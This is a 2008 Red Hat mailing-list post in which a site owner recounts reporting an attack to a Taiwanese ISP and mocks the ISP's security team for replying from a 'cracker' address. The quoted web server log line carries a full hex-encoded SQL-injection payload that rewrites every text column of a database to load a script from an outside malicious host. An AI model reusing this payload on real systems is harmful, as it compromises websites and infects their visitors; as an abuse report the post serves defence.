Personally, I just blocked all of apnic... They're the source of over 90% of my issues, and I don't really care if I make them mad. Of course, youmight not be able to do that if you're running a business... -----Original Message----- From: redhat-list-bounces@xxxxxxxxxx [mailto:redhat-list-bounces@xxxxxxxxxx] On Behalf Of Jose R R Sent: Wednesday, August 27, 2008 12:05 AM To: General Red Hat Linux discussion list Subject: Infiltration of ISP providers by crackers. So ...(sigh) what do you do when you complain to a given ISP provider about a case of attempted abuse by one of their IP addresses and you get a response from someone in the "security team" whose email name is "cracker?" Apparently some (or many) of these crackers own (with their consent or not) even their ISP providers --or worse, some (or many) ISP providers may be crackers themselves! A portion of my original complaint to the ISP --where I list one of the attempted abuse records by the cracker for informational purposes: ---------------------------------------------------------------------------------- from myself <my_emai_address> tonetwork-adm@xxxxxxxxx, network-center@xxxxxxxxx dateMon, Aug 25, 2008 at 11:37 PM subjectAbuse by user at IP address 118.167.20.180 mailed-bymy_domain On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time), user at IP address 118.167.20.180 abused <my> web site with the below referenced offending code (relevant web server log section is attached and named as abuse-118_167_20_180.txt). 118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php/2008/07/12/ xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S %20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D2268747470 3A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1; .NET CLR 1.1.4322)" [...] I would appreciate your cooperation in stopping this sort of cracker engagement. Thank you in advance for your prompt attention to this issue. ---------------End of portion of email sent---------------------------------------------------------------------------- Below is an Interesting section of one of the replies: ------------------------------------------------------------------- Return-Path: <my_email_address> Received: from localhost (localhost [127.0.0.1]) by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id m7QA4XUN014545 for <cracker@localhost>; Tue, 26 Aug 2008 18:06:31 +0800 [...] ----------End of unformatted reply---------------------------------------------------------- The above was attached to the formated email reply below: ---------------------------------------------------------------------- from cracker@xxxxxxxxx to<my_email_address> dateTue, Aug 26, 2008 at 4:24 AM subject[HiNetSOC/Craker : 1219749049]HiNet Notification(HiNet 通知) mailed-bylcss.hinet.net hide details 4:24 AM (11 hours ago) Reply Dear Sir: Thank you for your email. Please kindly provide us more detail information about the bad behavior at least including the attackers' IP address, time (GMT, Greenwich Mean Time) and evidence for further processing. - Hide quoted text - Yours sincerely, HiNet Security Operation Center Chunghwa Telecom Co., Ltd. Taipei, Taiwan, R.O.C. Email: cracker@xxxxxxxxx 請參考您的原始檢舉信件再附加檔案 ------End of formatted email reply------------------------------------------------------------------- No wonder spam and intrusion attempts never end. Jose R R http://www.metztli-it.com IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH and SuSE; official Ubuntu support coming at the end of August 2008. -- redhat-list mailing list unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe https://www.redhat.com/mailman/listinfo/redhat-list
